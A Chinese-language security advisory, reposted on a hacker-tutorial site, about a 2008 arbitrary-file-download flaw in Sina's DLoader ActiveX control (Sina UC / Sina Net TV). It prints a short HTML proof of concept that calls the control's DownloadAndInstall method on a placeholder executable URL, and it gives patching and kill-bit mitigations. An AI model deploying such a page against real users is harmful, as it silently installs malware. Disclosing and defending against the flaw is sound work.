|
 |
您现在的位置: 红色黑客联盟 >> 教程 >> 黑客技术 >> 漏洞利用 >> 正文 |
| 新浪DLoader Class ActiveX控件任意文件下载漏洞 |
|
|
|
| 文章录入:7747.Net 责任编辑:7747.Net 更新时间:2008-7-19 7:22:34 |
|
|
【字体:小 大】 |
|
来源:知道安全
发布日期:2008-7-18
最后更新日期:2008-7-18 15:57(GMT)
受影响系统: Sina UC 新浪网络电视 详细: 知道安全于近期捕获该漏洞的利用代码,在7月份网络上已经出现利用此漏洞的攻击代码.可导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到系统安装,并且随着系统启动而执行.
测试方法:
以下代码可能包含恶意行为,请勿轻易尝试,使用者风险自负.
<HTML><HEAD> <META http-equiv=Content-Type content=”text/html; charset=gb2312″> <META content=”MSHTML 6.00.2900.3354″ name=GENERATOR></HEAD> <BODY> <OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT> <SCRIPT> var YEtYcJsR1=”http://127.0.0.1/xxx.exe”; install[”DownloadAndInstall”](YEtYcJsR1); </SCRIPT> </BODY></HTML>
推荐的应对方法:
目前厂商已经发布新浪网络电视修复版本并且进行强制升级.请用户及时更新软件.
UC的用户请继续关注http://www.51uc.com/进行更新.
也可以为clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A设置kill bit.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{78ABDC59-D8E7-44D3-9A76-9A0918C52B4A}] “Compatibility Flags”=dword:00000400
|
| |
| 您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力 |
|
|
| |
上一篇文章: 阿里巴巴支付宝控件漏洞利用研究
下一篇文章: 没有了 |
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |